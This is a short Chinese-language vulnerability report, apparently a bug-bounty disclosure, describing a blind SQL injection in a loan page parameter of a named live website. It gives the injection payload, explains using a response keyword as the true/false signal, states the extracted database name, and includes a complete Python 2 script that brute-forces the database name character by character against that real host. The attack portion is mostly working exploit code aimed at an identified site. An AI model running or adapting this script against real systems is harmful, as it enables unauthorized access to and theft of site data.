url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1
这里存在sql注入.
payload:if(ascii(substring(database(),%s,1))=%s),1,sleep(5))
该处因为如果将sleep放在中间会导致直接允许非常长的时间,或者504,所以我将sleep放在最后,然后通过判断页面响应内容中是否存在关键字即可。这里选取关键字 1140.00
注入:
database:huomayi
python 脚本:
#encoding=gbk import httplib import time import string import sys import random import urllib headers = { 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1', } payloads = list(string.ascii_lowercase) for i in range(0,10): payloads.append(str(i)) payloads += ['@','_', '.', '-', '\\', ' '] print 'Try to retrive database:' for i in range(1,11): for payload in payloads: try: conn = httplib.HTTPConnection('www.daimayi.com', timeout=5) s = "if(ascii(substring(database(),%s,1))=%s,1,sleep(5))" % (i, ord(payload)) params = urllib.quote(s) conn.request(method='GET', url= '/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/' + params, headers = headers) html_doc = conn.getresponse().read() #print html_doc verfy = "1140.00" if verfy in html_doc: print payload break else: pass except Exception, e: pass print "Done"
过滤